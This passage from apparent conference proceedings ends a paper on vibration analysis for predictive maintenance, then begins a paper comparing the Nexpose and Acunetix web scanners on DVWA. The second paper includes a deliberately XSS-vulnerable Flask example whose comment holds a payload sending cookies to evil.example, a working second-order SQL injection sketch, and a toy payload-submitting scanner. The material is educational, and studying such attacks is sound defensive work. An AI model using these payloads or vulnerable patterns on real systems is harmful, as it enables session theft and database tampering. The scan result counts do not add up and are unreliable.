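envelope = np.abs(hilbert(filtfilt(b, a, x)))             # demodulation: Hilbert envelope
spectrum = np.abs(np.fft.rfft(envelope - envelope.mean()))
freqs = np.fft.rfftfreq(len(envelope), 1 / fs)

band = freqs <= 1500                          # envelope spectrum in the 0-1500 Hz range
print("dominant envelope frequency [Hz]:", freqs[band][np.argmax(spectrum[band])])

If the printed frequency matches a theoretical bearing defect frequency, the corresponding fault is suspected.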

3.2 Commonly Witnessed Machinery Faults Diagnosed by Vibration Analysis

The task of condition monitoring and fault diagnosis of rotating machinery faults is both significant and important, but it is often cumbersome and labour intensive [14]. It is nevertheless possible if one knows beforehand the vibration symptoms associated with each defect likely to affect the machine, that is to say, if the vibratory signatures induced by these defects are known. Some of the machinery faults detected using vibration analysis are listed below (Table 1).


Fig. 2. Envelope Method Operation Diagram.

3.3 Vibration Signal Analysis and Measurement

Time Domain Vibration Analysis. A vibration is characterized mainly by its frequency, its amplitude, and its nature. Three detection modes are commonly used in vibration measurement:

The Peak-to-Peak Value. Indicates the difference between the maximum and minimum amplitudes of the movement.

The Peak Value. Indicates the maximum amplitude of the signal measured from the zero level.

The RMS Value. Is the most informative measure of vibration amplitude. In addition to taking into account the evolution of the signal over time, the calculation of the effective (RMS) value is linked to the vibrational energy and therefore to the "potential for deterioration" of the vibration.

Table 1. Main defects of rotating machines detected by vibration analysis.

Unbalance – The uneven distribution of mass around the axis of rotation of a rotor. Vibration due to the unbalance of a rotor is probably the most common machinery defect. It generally comes from defects in machining, assembly, and mounting. Three types of unbalance can be distinguished: static unbalance, couple unbalance, and dynamic unbalance.

Misalignment – Misalignment occurs when the shaft centerlines of two directly mating components meet at an angle and/or are offset from one another. It is one of the main causes of reduced equipment life. It concerns either two shafts linked by a coupling or two bearings supporting the same axis.

Bent shaft – Bends in shafts may develop in several ways, such as creep, thermal distortion, or a large unbalance force. A bent shaft generates excessive vibration in a machine, depending on the amount and location of the bend.

Gear defects – Gear faults typically occur in the teeth of a gear mechanism due to fatigue, spalling, or pitting. These can manifest as cracks in the gear root or removal of metal from the tooth surface. They can be caused by wear, excessive loads, poor lubrication, backlash, and occasionally improper installation or manufacturing defects.

Bearing defects – Bearings are among the most stressed components of machinery and are a frequent source of failure. The defects that can be encountered include flaking, seizing, and corrosion (which leads to flaking).

Loosening – Mechanical looseness occurs when rotating components have been fitted incorrectly. It can occur at three locations: internal assembly looseness, looseness at the machine-to-base-plate interface, and structural looseness.

Vibration analysis starts with a time-varying, real-world signal from a transducer or sensor. Analyzing vibration data in the time domain (amplitude plotted against time) is limited to a few parameters in quantifying the strength of a vibration profile: amplitude, peak-to-peak value, and RMS (Table 2).

Here $A_{RMS}$ denotes the root mean square amplitude, $x(t)$ the instantaneous amplitude, $A_p$ the peak amplitude, and $T$ the signal analysis time.

Table 2. Calculation of Root Mean Square Amplitude.

Case of a sinusoidal vibration: $A_{RMS} = \dfrac{A_p}{\sqrt{2}} = 0.707\,A_p$

Case of other vibrations: $A_{RMS} = \sqrt{\dfrac{1}{T}\displaystyle\int_{0}^{T} x^{2}(t)\,dt}$
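A minimal Python sketch of these three time-domain indicators on a synthetic signal (assumed amplitude and frequency) is shown below; for a pure sinusoid the computed RMS reproduces the 0.707 relation of Table 2.

import numpy as np

fs, f0, A_p = 5000, 50.0, 2.0                 # sampling rate, frequency, peak amplitude (assumed)
t = np.arange(0, 1.0, 1 / fs)
x = A_p * np.sin(2 * np.pi * f0 * t)          # synthetic sinusoidal vibration signal

peak_to_peak = x.max() - x.min()              # difference between max and min amplitudes
peak = np.abs(x).max()                        # maximum amplitude from the zero level
rms = np.sqrt(np.mean(x ** 2))                # effective value, linked to vibration energy

print(f"peak-to-peak = {peak_to_peak:.3f}, peak = {peak:.3f}, RMS = {rms:.3f} (about 0.707 x peak)")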

Various factors are essential in the RMS analysis of vibrations:

o Vibration sensors
o Signal conditioning
o Data acquisition system along with its configuration
o Vibration measurement set-up

The RMS value is used because it is directly related to the energy content of the vibration profile and therefore to the destructive capacity of the vibration. RMS also takes into account the time history of the waveform.

Frequency Domain Vibration Analysis. The classical frequency analysis can be obtained from the Fourier transform of the time signal. Several spectral analysis techniques can give a good idea of the overall health and condition of the bearings. The fast Fourier transform (FFT) is a computational tool that facilitates signal analysis [15]. Knowledge of frequency indicators helps locate and identify the kind of fault present in rotating machinery. Inspecting measured data in the frequency domain is often the primary part of analyzing and monitoring signals. Data from a variety of sensors are used to solve problems, monitor machinery, and predict machine health, including bearing fault detection for rotating machinery. When performing rotating machinery diagnostics, certain frequency components relate to specific mechanical parts within the machine. FFT analysis allows inspecting how devices react at individual frequencies during vibration testing of components and devices. This means that frequency spectra can help with design optimizations, as well as with specifying deflection limitations. FFT can also be used to determine acceptable tolerance curves over the measured frequency range and to alert users when critical vibration levels are exceeded at specific frequencies (Fig. 3).

Application to Some Faults of Rotating Machines. The following table presents a comparison between the initial state and the evolved state for some faults of rotating machines (Table 3).

Vibration Limits Proposed by the AFNOR E90-300 Standard. The vibration parameter used for the classification of machines is the effective amplitude of the vibration velocity, in mm/s RMS, in the band [10; 1000] Hz (Table 4).


Fig. 3. A time signal with sinusoidal components and its representation in the frequency domain.

Table 3. Initial and Evolved State (columns: initial state, evolved state; rows: unbalance, edging).

3.4 The Accelerometer Sensor

The main objective of the signal analysis involved in a structural vibration test is to obtain information on the amplitudes, frequencies, and phase differences of the measured accelerations [16]. In the implementation of vibration-analysis monitoring, accelerometers are the best option because they are simple, easy to apply, and very sensitive to the high-frequency vibrations generally generated in the event of mechanical failure [17]. An accelerometer is a device that measures the vibration, or acceleration of motion, of a structure. The force caused by vibration or by a change in motion (acceleration) causes the mass to "squeeze" the piezoelectric material, which produces an electrical charge proportional to the force exerted on it. The sensor consists of a piezoelectric element pre-stressed by a seismic mass: the vibration varies the pre-stress (in compression or shear) and deforms the piezoelectric element, which then generates an electrical signal (Fig. 4).

Table 4. Permissible Vibration Levels on Rotating Machines. For each machine size class (small: less than 15 kW; medium: between 15 kW and 75 kW; large: greater than 75 kW), the state A, B, C, or D is read against the effective amplitude of the vibration velocity, in mm/s RMS in the band [10; 1000] Hz, on the scale 0.28, 0.45, 0.71, 1.12, 1.80, 2.80, 4.50, 7.10, 11.20, 18.00, 28.00, 45.00 (A corresponds to the lowest levels and D to the highest).

Fig. 4. Piezoelectric accelerometer

3.5 Classification of Diagnostic Methods

The AFNOR standard [18] defines diagnosis as the identification of the probable cause of the failure(s) using logical reasoning based on a set of information from an inspection, check, or test. Diagnostic methods can be summarized as in Fig. 5.

Fig. 5. Classification of diagnostic methods [19]. The classification distinguishes internal methods, which rely on knowledge of the operation in the form of mathematical models (diagnostic methods by physical modeling, analytical redundancy, parameter identification, state vector estimation), from external methods, for which no model is available to describe cause-and-effect relationships (diagnostic methods by external signature analysis and pattern recognition, diagnostic methods by functional modeling, and inductive and deductive methods such as the fault tree and FMEA).

4 Wireless Sensor Network (WSN)

A Wireless Sensor Network (WSN) is a distributed sensor network composed of a large number of low-cost, low-performance, self-managing nodes [20]. It makes it possible to solve the monitoring and control tasks that are critical for the operating time of the sensors. The main area of application is the control and monitoring of measured parameters of physical environments and objects: a WSN is used to monitor physical or environmental conditions such as temperature, sound, vibration, pressure, and motion, and to cooperatively pass the data through the network to a main location or sink where the data can be observed and analyzed. The network architecture of our WSN can be summarized in three layers:

Application Layer. The role of the application layer is to abstract the physical topology of the WSN for applications. Moreover, the application layer provides the necessary interfaces for data visualization through a Graphical User Interface (GUI), presenting the processed data in different forms such as plots and charts.

Transport Layer. Transport layer protocols are responsible for the end-to-end transmission of data packets, including provisions for reliable or unreliable data delivery. This layer also represents the link between the application and sensor layers for capturing the data generated by the different sensors on board the machines, by using an IoT platform and a communication channel with low latency and a high transfer rate.

Sensor Layer. This is the base layer of our WSN architecture, responsible for sensing data from connected machines and devices by using an advanced M2M communication standard protocol such as Open Platform Communications Unified Architecture (OPC UA), which helps make the data exchange between users and servers more accurate.


These protocols are widely used in automation industries for establishing M2M communication by using the concept of an aggregating server, where multiple servers are pinned to a single server [21]. In addition, the gathered data are categorized by complexity for pre-processing and processing, which requires data cleaning before the data are transmitted.

5 Results and Discussions

In this paper, we propose a fault diagnosis system for predictive maintenance by vibration analysis of rotating machinery, based on a wireless sensor network. Our scheme (Fig. 6) comprises three layers. The first layer (sensor layer) consists of a set of smart sensors (vibration sensors) that collect data from connected machines and devices and communicate with each other. As explained in the previous section, the transport layer represents the link between the application and sensor layers, capturing the data generated by the different sensors on board the machines through an IoT platform and transmitting the information to the application layer via the base stations. The application layer contains several components, starting with the data center, an infrastructure made up of a network of computers and storage spaces whose aim is to organize, process, and store our massive data. Next come the database servers, which are used to store and manage the databases hosted on the server and to provide data access to authorized users [22]. Since we are dealing with Big Data, we need a technology that enables rapid analysis of our data; that is why we added an OLAP (Online Analytical Processing) database to our scheme. OLAP is a computer processing technology that allows us to easily query and extract the data in order to compare them in different ways. In other words, the online data are converted from raw to clean (eliminating redundant data, etc.) and then compared with the expected values of our system parameters; this is the fault detection step. We continue to monitor the system in a continuous way, applying the Fast Fourier Transform to obtain frequency-domain data, until an unusual behavior is noticed, because changes in vibration signals due to a fault can be detected by employing signal-processing methods and used to evaluate the health status of the machinery. The nature and severity of the problem can be determined by analyzing the vibration signal, and hence the failure can be predicted; the diagnosis then aims to identify the probable cause of the failure. All these devices share a common communication line or wireless link to a server within a distinct geographic area via a monitoring-center LAN (Local Area Network).
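The fault-detection step of this scheme can be sketched in a few lines. The toy Python loop below (with a hypothetical alert threshold and a synthetic signal generator) compares the RMS value of each incoming measurement window with an expected level and, when an unusual behavior is noticed, computes the FFT of the window to extract the dominant frequency component for diagnosis; it is only an illustration of the processing flow of Fig. 6, not the deployed system.

import numpy as np

FS = 10000                 # sampling rate in Hz (assumption)
RMS_ALERT = 1.0            # alert threshold, hypothetical value

def read_window(faulty=False, n=FS):
    """Stand-in for one window of data coming from the sensor layer."""
    t = np.arange(n) / FS
    x = 0.5 * np.sin(2 * np.pi * 50 * t)          # normal 50 Hz running-speed component
    if faulty:
        x += 2.0 * np.sin(2 * np.pi * 150 * t)    # extra component simulating a defect
    return x + 0.1 * np.random.randn(n)

def diagnose(window):
    spectrum = np.abs(np.fft.rfft(window))
    freqs = np.fft.rfftfreq(len(window), 1 / FS)
    return freqs[np.argmax(spectrum[1:]) + 1]     # dominant frequency (DC bin skipped)

for faulty in (False, True):
    window = read_window(faulty)
    rms = np.sqrt(np.mean(window ** 2))
    if rms > RMS_ALERT:                           # fault detection on the time-domain indicator
        print(f"alert: RMS={rms:.2f}, dominant frequency {diagnose(window):.0f} Hz")
    else:
        print(f"normal: RMS={rms:.2f}")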


Fig. 6. The proposed Fault Diagnosis System for Predictive Maintenance based on Wireless Sensor Network

6 Conclusion and Perspectives

Predictive maintenance consists of anticipating future failures of a piece of equipment, an object, or a system; its name comes from the fact that it uses the artificial intelligence and big data techniques employed in Industry 4.0. The predictive maintenance process starts with data acquisition (via smart sensors) and data or signal processing, which is divided into time-domain, frequency-domain, and time-frequency-domain analysis. Time-domain analysis involves statistical features such as the peak and root-mean-square (RMS) values, while frequency-domain analysis relies on the fast Fourier transform (FFT). A fault diagnosis system for predictive maintenance by vibration analysis was proposed using a wireless sensor network architecture, which is used to monitor physical or environmental conditions. However, wireless sensor networks have some disadvantages that should be improved:

o Since the network is wireless in nature, the risk of being hacked is always present.
o It cannot be used for high-speed communication because it is designed for low-speed applications.
o The construction of such a network is expensive and therefore not affordable for everyone.

The future will see a next-generation maintenance strategy that can be achieved using the Internet of Things (IoT) and deep learning. Smart wireless sensors will be installed that will be able to train themselves on the vibration data and undertake the required learning about the health condition [23]. The sensor will be able to determine the RUL of the machinery and, based on it, decide whether to keep the machine running or stop it for breakdown maintenance.

Acknowledgments. This work was supported by the Ministry of Higher Education, Scientific Research and Innovation, the Digital Development Agency (DDA) and the CNRST of Morocco APIAA-2019-KAMAL.REKLAOUI-FSTT-Tanger-UAE.

References 1. Baheti, R., Gill, H.: Cyber-physical systems. Impact Control Technol. 12(1), 161–166 (2011) 2. Lee, J., Bagheri, B., Kao, H.A.: A cyber-physical systems architecture for Industry 4.0-based manufacturing systems. Manuf. Lett. 3, 18–23 (2015). https://doi.org/10.1016/j.mfglet.2014. 12.001 3. Silvestri, L., Forcina, A., Introna, V., Santolamazza, A., Cesarotti, V.: Maintenance transformation through Industry 4.0 technologies: a systematic literature review. Comput. Ind. 123, 103335 (2020). https://doi.org/10.1016/j.compind.2020.103335 4. Heng, A., Zhang, S., Tan, A.C.C., Mathew, J.: Rotating machinery prognostics: state of the art, challenges and opportunities. Mech. Syst. Signal Process. 23(3), 724–739 (2009). https:// doi.org/10.1016/j.ymssp.2008.06.009 5. Zonta, T., da Costa, C.A., da Rosa Righi, R., de Lima, M.J., da Trindade, E.S., Li, G.P.: Predictive maintenance in the Industry 4.0: a systematic literature review. Comput. Ind. Eng. 150, 106889 (2020). https://doi.org/10.1016/j.cie.2020.106889 6. Pech, M., Vrchota, J., Bednáˇr, J.: Predictive maintenance and intelligent sensors in smart factory: review. Sensors 21(4), 1470 (2021). https://doi.org/10.3390/s21041470 7. Coand˘a, P., Avram, M., Constantin, V.: A state of the art of predictive maintenance techniques. IOP Conf. Ser. Mater. Sci. Eng. 997(1), 012039 (2020). https://doi.org/10.1088/1757-899X/ 997/1/012039 8. Abdelhak, E.H., Kaddour, R., Abbes, E.M., Mohamed, B.: Maintenance predictive et preventive basee sur l’analyse vibratoire des rotors, p. 19


9. Chiementin, M.X., Rasolofondraibe, M.L.: Contribution au processus de surveillance intelligente des machines tournantes : cas des roulements à billes. Thèse dirigée par XAVIER CHIEMENTIN ET LANTO RASOLOFONDRAIBE, p. 137 10. Jouin, M., Gouriveau, R., Hissel, D., Pera, M.C., Zerhouni, N.: PHM of proton-exchange membrane fuel cells - a review. Chem. Eng. Trans. 33, 1009–1014 (2013). https://doi.org/10. 3303/CET1333169 11. Zwingelstein, G.: La maintenance prédictive intelligente pour l’industrie 4.0., Maintenance (2019). https://doi.org/10.51257/a-v1-mt9572 12. Jardine, A.K.S., Lin, D., Banjevic, D.: A review on machinery diagnostics and prognostics implementing condition-based maintenance. Mech. Syst. Signal Process. 20(7), 1483–1510 (2006). https://doi.org/10.1016/j.ymssp.2005.09.012 13. Kalgren, P., Byington, C., Roemer, M., Watson, M.: Defining PHM, a lexical evolution of maintenance and logistics. In: 2006 IEEE Autotestcon, Anaheim, CA, USA, September 2006, pp. 353–358. https://doi.org/10.1109/AUTEST.2006.283685 14. Yang, H.: Intelligent diagnosis of rotating machinery faults - a review, p. 8 15. Cochran, T., et al.: What is the fast fourier transform? Proc. IEEE 55(10), 1664–1674 (1967) 16. Han, S.: Measuring displacement signal with an accelerometer. J. Mech. Sci. Technol. 24(6), 1329–1335 (2010). https://doi.org/10.1007/s12206-010-0336-1 17. Mailly, F., Giani, A., Martinez, A., Bonnot, R., Temple-Boyer, P., Boyer, A.: Micromachined thermal accelerometer. Sens. Actuators Phys. 103(3), 359–363 (2003). https://doi.org/10. 1016/S0924-4247(02)00428-4 18. AFNOR, Techniques for analysing the reliability of systems - procedures for analysing failure modes and their effects (AMDE), Standard NF x 60 510, 1986.pdf 19. Zwingelstein G.: Diagnostic des défaillances- théorie et pratique pour les systèmes industriels, Traité des Nouvelles technologies, série Diagnostic et Maintenance, Hermès, Paris, 1995.pdf 20. Chen, Y., Yang, X., Li, T., Ren, Y., Long, Y.: A blockchain-empowered authentication scheme for worm detection in wireless sensor network. Digit. Commun. Netw., S2352864822000566 (2022). https://doi.org/10.1016/j.dcan.2022.04.007 21. Muniraj, S.P., Xu, X.: An implementation of OPC UA for machine-to-machine communications in a smart factory. Procedia Manuf. 53, 52–58 (2021). https://doi.org/10.1016/j.promfg. 2021.06.009 22. Grasdal, M., Hunter, L.E., Cross, M., Hunter, L., Shinder, D.L., Shinder, T.W.: MCSE 70-293: planning server roles and server security. In: MCSE (Exam 70-293) Study Guide, pp. 53–146. Elsevier (2003). https://doi.org/10.1016/B978-193183693-7/50006-3 23. Kumar, A., Gandhi, C.P., Zhou, Y., Kumar, R., Xiang, J.: Latest developments in gear defect diagnosis and prognosis: a review. Measurement 158, 107735 (2020). https://doi.org/10.1016/ j.measurement.2020.107735

A Comparative Study of Vulnerabilities Scanners for Web Applications: Nexpose vs Acunetix Bochra Labiad(B) , Mariam Tanana, Abdelaziz Laaychi, and Abdelouahid Lyhyaoui Laboratory of Innovative Technologies (LTI), National School of Applied Sciences of Tangier, Abdelmalek Essaadi University, Tetouan, Morocco {bochra.labiad,abdelaziz.laaychi}@etu.uae.ac.ma, {mtanana,a.lyhyaoui}@uae.ac.ma

Abstract. As is well known, everyone uses web applications to make purchases, transfer funds, upload data, etc. Meanwhile, the security of these web applications has become a significant challenge due to various vulnerabilities such as XSS, SQL injection (second order), and many others. For this aim we have penetration testing, which plays a very important role in detecting those vulnerabilities. It is called a simulated network attack, in which professional ethical hackers break into the company's network to find vulnerabilities using tools that have been proven to uncover different types of vulnerabilities in a very short time. In recent years, cybersecurity has seen a different kind of vulnerability detection based on AI, more specifically machine learning, and this challenge has led cyber-defense engineers to create different modules to handle it. In this article, we compare two penetration testing tools while scanning the same target, discovering three top-ranking vulnerabilities, and reviewing some approaches.

Keywords: Web applications · Vulnerabilities · Exploits · Penetration test

1 Introduction

Strong web site security is critical to the success of an online business. The importance of security has greatly increased, especially for web applications. Solving problems related to websites or website security requires careful planning and knowledge, not only because of the many tools available but also because of the immaturity of the industry [1]. Nowadays, with the ubiquity of web applications, the demand for web application development is growing rapidly. The advantage of web development is that young developers with interesting ideas can work together to develop web applications. As a result, vulnerabilities are caused by the inexperience of web developers or by built-in errors of the platform used. Inexperienced web developers who are not fully aware of secure coding practices design applications with high security risks. These applications, if launched without adequate security testing, become attractive targets for attackers. Anyone who uses such vulnerable applications becomes the hacker's prey, and their privacy and confidential information are at risk [2]. Web application vulnerabilities can also refer to vulnerabilities in the underlying business logic, which are usually left unresolved even in a secure environment. An important stage in the software development life cycle concerns an important part of web application security: the vulnerability assessment/penetration testing phase of the web application. This step mainly uses two methods: manual web application vulnerability assessment and automatic software vulnerability assessment. During the vulnerability assessment phase of a web application, these tools can help identify general vulnerabilities that have slipped through the development phase [3]. Web site vulnerabilities and exploits continue to evolve; standards that are acceptable today may become obsolete tomorrow, leading to new exploits. Therefore, in this review and future work, we discuss three top-ranking vulnerabilities and two strong vulnerability scanners, and we make a comparison between these two scanners. Finally, we suggest that in future work we will see how machine learning could help and be developed to discover those three top-ranking vulnerabilities.

2 Description of XSS, SQL Injection (Second Order) and CSRF

The popularity of the World Wide Web has made websites and their visitors attractive targets for various types of cybercrime, including data breaches, targeted phishing campaigns, ransomware, and fake technical-support fraud. These attacks happen every day, and more than 76% of websites contain security vulnerabilities [4]; that is why penetration testing has recently been developing rapidly, given the number of vulnerabilities and breaches occurring every minute. Penetration testing involves many different things, some of which include Wi-Fi, networks, software, and hardware. Most systems and websites have weaknesses present when launched. These vulnerabilities are called zero-day vulnerabilities; they are either considered by the companies as not severe enough to be fixed, or the companies know nothing about them. There are many interoperability issues between software and hardware. These issues may remain unknown for many years before being discovered, and some are never discovered because the issue never occurs [5]. As we all know, applications and the operating systems that support them are very complex software. When the software is released, different users can use it in different ways, which can lead to unexpected errors that an attacker can manipulate to gain access. Therefore, it is very important to understand the vulnerabilities of systems and applications, and this knowledge is essential to prevent or mitigate malicious attacks [6]. There are many known web application vulnerabilities, such as XSS, SQL injection (second order), and CSRF. We introduce them in the following sections.

2.1 Cross Site Scripting (XSS)

XSS vulnerabilities can be exploited directly or indirectly. The sensitive information that hackers steal by exploiting XSS vulnerabilities is not limited to cookie data [3]. More precisely, Cross-Site Scripting (XSS) is an application-level code injection vulnerability. It occurs whenever a server program (dynamic website) includes unvalidated input, coming from an HTTP request, a database, or a file, in its response. Attackers use it to steal sensitive information (such as cookies and sessions) and to perform other malicious actions [7]. XSS is usually divided into three types:

– Reflected Cross-Site Scripting
– Stored/Persistent Cross-Site Scripting
– DOM-Based Cross-Site Scripting

Figure 1 shows the sequence of steps to execute a stored XSS attack. First, the attacker uses the comment form on a blog site to insert a malicious script, which is stored in the site's database. Then, legitimate users send HTTP requests to the site to view the latest comments. The site returns the saved comment and its script in its response. Finally, the legitimate user's browser runs the script and sends the legitimate user's confidential information to the attacker's server [7].

Fig. 1. Sequence Diagram to Represent XSS Attack Scenario.
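To make this scenario concrete, the following sketch contrasts a deliberately vulnerable comment endpoint with an escaped variant. It is an illustrative example only and is not taken from the paper; Flask is assumed, and the route names and in-memory "database" are hypothetical.

# Illustrative stored-XSS sketch (assumed Flask application; names are hypothetical).
from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)
comments = []  # stands in for the site's comment database

@app.route("/comment", methods=["POST"])
def add_comment():
    # Step 1: the attacker submits e.g. "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
    comments.append(request.form["text"])  # stored without any sanitization
    return "saved"

@app.route("/comments")
def show_comments():
    unsafe_page = "<br>".join(comments)                    # vulnerable: the payload runs in every visitor's browser
    safe_page = "<br>".join(escape(c) for c in comments)   # safer: HTML-escaping neutralizes the script
    return safe_page  # returning unsafe_page instead would reproduce the attack of Fig. 1

if __name__ == "__main__":
    app.run()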

2.2 SQL Injection (Second-Order)

The majority of daily transactions are done online through web applications, e.g., online shopping, online banking, reservations, etc. All the user and transaction data provided on these sites is retrieved and stored in a database. But the database in which this information is stored is highly vulnerable to SQL injection attacks. An SQL injection attack consists of the attacker inserting malicious SQL statements that could give him access to the database or to the information stored in it, or harm the web application or the privacy of its users [8]. In a first-order SQL injection, the payload is passed directly into the SQL query, whereas a second-order SQL injection attack unfolds in two stages: first the payload is stored in the database or in a system file, and later it is read back from the database or file system and embedded in a new SQL query. Common web application functions such as user registration followed by modification of user information can therefore be used to perform a second-order SQL injection attack: the registration function loads the attack payload into the database, and afterward the function for modifying user information extracts the payload from the database to build a SQL query, which causes the second-order SQL injection. The key code of the user registration function is as follows [9]:

$link = new mysqli("localhost", "root", "root");
$query = "INSERT INTO Users VALUES (?, ?, ?)";
$cmd = $link->prepare($query);
$cmd->bind_param("sss", $username, $password, $email);
$cmd->execute();
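To illustrate how the stored payload resurfaces in the second stage, here is a small, hedged sketch that is not taken from the paper or from [9]; it uses Python with sqlite3, and the table, columns, and variable names are hypothetical.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")

# Stage 1 - registration: the payload is stored safely through a parameterized query.
malicious_name = "bob'; UPDATE users SET email='owned' WHERE 'a'='a"
conn.execute("INSERT INTO users (username, email) VALUES (?, ?)", (malicious_name, "bob@example.com"))

# Stage 2 - profile update: the stored value is read back and concatenated into a new
# statement, so the payload now executes as SQL (the second-order injection).
stored_name = conn.execute("SELECT username FROM users").fetchone()[0]
unsafe_query = "UPDATE users SET email='new@example.com' WHERE username='" + stored_name + "'"
conn.executescript(unsafe_query)   # vulnerable: the injected UPDATE also runs
print(conn.execute("SELECT email FROM users").fetchone())   # -> ('owned',)

The first stage is harmless because the parameterized query keeps the payload as plain data; the vulnerability only appears in the second stage, where the trusted-looking stored value is concatenated into a new statement.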

2.3 CSRF (Cross-Site Request Forgery)

Cross-Site Request Forgery (CSRF) is also known as "session riding" and "one-click attack". It occurs when a malicious website, web forum, or email causes the victim's web browser to perform unwanted actions on a trusted web page [10]. The CSRF vulnerability is possible because the attacker can trigger any of the actions the user could take, for example creating users/entries or changing/deleting the client's data, without the server being able to differentiate between a legitimate and a forged request [11]. These vulnerabilities are among the most prominent cited by OWASP (the Open Web Application Security Project) over the past two years, and penetration testing tools are being developed to mitigate and fix these types of vulnerabilities and improve the security of web applications. The scanning process starts by pasting into the crawler's URL input field the URL of the application to be scanned for vulnerabilities. An application scanner usually consists of three main components that together complete the scanning process (a minimal sketch of this pipeline follows the list) [12]:



– Scanning component: after the target URL is inserted, the crawling process begins, during which the scanning component identifies all available web pages and all entry points of the target application.
– Attack component: the attack component analyzes the detected data; the application scanner generates an attack module for each input field and each form, with a test vector intended to trigger the vulnerability. This data is then sent to the server to obtain a response.
– Analysis component: the response from the server is parsed and interpreted as required [12].
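The following Python sketch is a toy illustration of how these three components fit together; it is not the architecture of Acunetix or Nexpose, and the payload, libraries (requests, BeautifulSoup), and detection logic are simplified assumptions.

import requests
from bs4 import BeautifulSoup

PAYLOAD = "<script>alert(1)</script>"   # single reflected-XSS test vector, for illustration only

def scan(url):
    # Scanning component: fetch the page and enumerate its forms (entry points).
    page = requests.get(url, timeout=10)
    forms = BeautifulSoup(page.text, "html.parser").find_all("form")
    findings = []
    for form in forms:
        target = requests.compat.urljoin(url, form.get("action") or url)
        fields = {i.get("name"): PAYLOAD for i in form.find_all("input") if i.get("name")}
        # Attack component: submit the test vector through every input field.
        if form.get("method", "get").lower() == "post":
            response = requests.post(target, data=fields, timeout=10)
        else:
            response = requests.get(target, params=fields, timeout=10)
        # Analysis component: a reflected payload in the response suggests an XSS sink.
        if PAYLOAD in response.text:
            findings.append(target)
    return findings

A real scanner crawls recursively, carries many test vectors per vulnerability class, and interprets responses far more carefully; the sketch only shows how the crawl, attack, and analysis stages chain together.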

3 Penetration Testing Concept

In this section, we give an overview of web application vulnerabilities and their exploitation based on surveys and various articles published between 2015 and 2020. First, vulnerabilities can occur at different levels, such as the web application level, the hosting level, and the network level; a vulnerability at any level can compromise the security of an otherwise protected web application. Penetration testing and vulnerability assessment are distinctive protection methods that may be used to eliminate the technical and logical weaknesses of any of these layers. Their main objective is to have the different layers of a system audited by external experts [13,14]. Vulnerability Assessment and Penetration Testing (VAPT) additionally includes the verification of the implemented security mechanisms by security experts; VAPT is performed by outside security experts (called pentesters) who are able to reveal vulnerabilities using exploits and vulnerability scanners. In the past five years, the cybersecurity field has discovered new vulnerabilities and re-examined existing ones. Every year there is a new OWASP Top Ten, as well as other rankings mentioned in the first section, covering XSS, SQL injection, and CSRF. SQL injection and XSS attacks remain the top security threats to web applications. On the implementation side, it is difficult or even impossible to write code without loopholes. For example, using parameterized queries that separate query statements from user input can help prevent SQL injection attacks; however, this cannot solve the problem of developers' inattention, and in some cases the data provided by the user needs to be aggregated into the query [4]. Such security loopholes are observed through Vulnerability Assessment and Penetration Testing techniques. In 2016, Tanjila Farah proposed a black-box testing method for implementing and testing XSS and CSRF attacks [11]. This approach found nearly 30% of web applications vulnerable to XSS and CSRF attacks. With black-box testing methods it takes time to launch XSS and CSRF attacks, but it helps to reduce and fix these kinds of vulnerabilities [11]. Additionally, web applications use a database server on the back end: the website connects to the database, requests data, and presents the received data in the browser. This is where the SQL injection attack, originating from the user, comes in. In fact, SQL injection can enable further malicious attacks by executing commands on servers, which can then receive and install viruses and other malicious software, and it allows data update, data deletion, and data injection [11]. Sometimes the attack escalates to a second-order SQL injection, when the payload stored in the database is untrusted data entered by a malicious user while the SQL fragments in the web application are trusted; the DBMS (Database Management System) cannot distinguish the trusted and untrusted parts of a SQL statement [9]. As shown in Fig. 2, Chen Ping proposed a defense method consisting of a proxy server placed between the web server and the database server; the proxy server has two main functions, one being to detect SQL injection attacks and the other to de-randomize the harmless instructions back into standard SQL statements and forward them to the DBMS [9].

Fig. 2. SQL injection’s scenario.

There are many types of tools that can be used to discover vulnerabilities in web applications, and, as mentioned earlier, newer scanners are being developed using machine learning and other recent concepts. In this article, we choose Nexpose and Acunetix as penetration testing tools, both of which are used to reveal vulnerabilities in web applications.

3.1 Acunetix

Acunetix is a well-known web application vulnerability scanner (WAVS) used as a penetration testing tool. It can detect many vulnerabilities, including XSS and SQL injection, and it is one of the most widely used security assessment tools. Acunetix is a commercial software package that the buyer must purchase in order to be licensed under one of the available subscriptions. It is delivered as a desktop GUI application that users can easily interact with. In addition, reports can be managed, for example to generate results and recommendations for resolving the security vulnerabilities identified in the application. All identified vulnerabilities are marked according to their status, such as open or patched [15].


3.2 Nexpose

Nexpose is a unified vulnerability detection solution that scans the network to identify the devices running on it and checks those devices for vulnerabilities. It analyzes the scanned and processed data to generate reports. We can use these reports to assess the security of our network at various levels, obtain additional information, and quickly address any weaknesses [16]. According to Sectools in 2015 [17], Nexpose was ranked 9th among VAPT tools, while Acunetix was ranked 11th [18].

4 Application and Comparison

In this section, we scan the Damn Vulnerable Web Application (DVWA) to uncover the vulnerabilities and weaknesses that DVWA contains. To do so, we use Acunetix and Nexpose alternately, in order to compare their performance in terms of features.

4.1 Proposed Architecture

In this study, we propose the architecture shown in Fig. 3 to deploy Nexpose and Acunetix, our solutions to discover, visualize, and report vulnerabilities in the different layers of the chosen web application. In this architecture, we uncover all vulnerabilities and assets found in the website chosen to be scanned, namely:

– Damn Vulnerable Web Application (DVWA)

We use the most important advantages of Nexpose and Acunetix to uncover the weaknesses and assets in a short and reasonable time. We end up with a report in PDF format describing all the vulnerabilities found.

4.2 Benchmarking

As described in the architecture, we performed a full scan of DVWA with Nexpose, and we carried out the same scan with Acunetix. According to our experiments, DVWA has multiple vulnerabilities, including brute-force login, command execution, CSRF, file injection, SQL injection, payload vulnerabilities, XSS, and more. Our Acunetix scan identified 75 vulnerabilities:

– 16 critical vulnerabilities
– 37 midrange vulnerabilities
– 22 low profile vulnerabilities
– 6 critical vulnerabilities

With Acunetix we could benefit from the many features that it offers to protect against the following attacks:

Fig. 3. Proposed architecture.

– CRLF injection attacks
– Code execution attacks
– Directory traversal attacks
– File inclusion attacks
– Input validation attacks

In contrast, the Nexpose scan of a single asset identified:

– 339 vulnerabilities
– 39 midrange vulnerabilities
– 170 low profile vulnerabilities
– 50 critical vulnerabilities and more

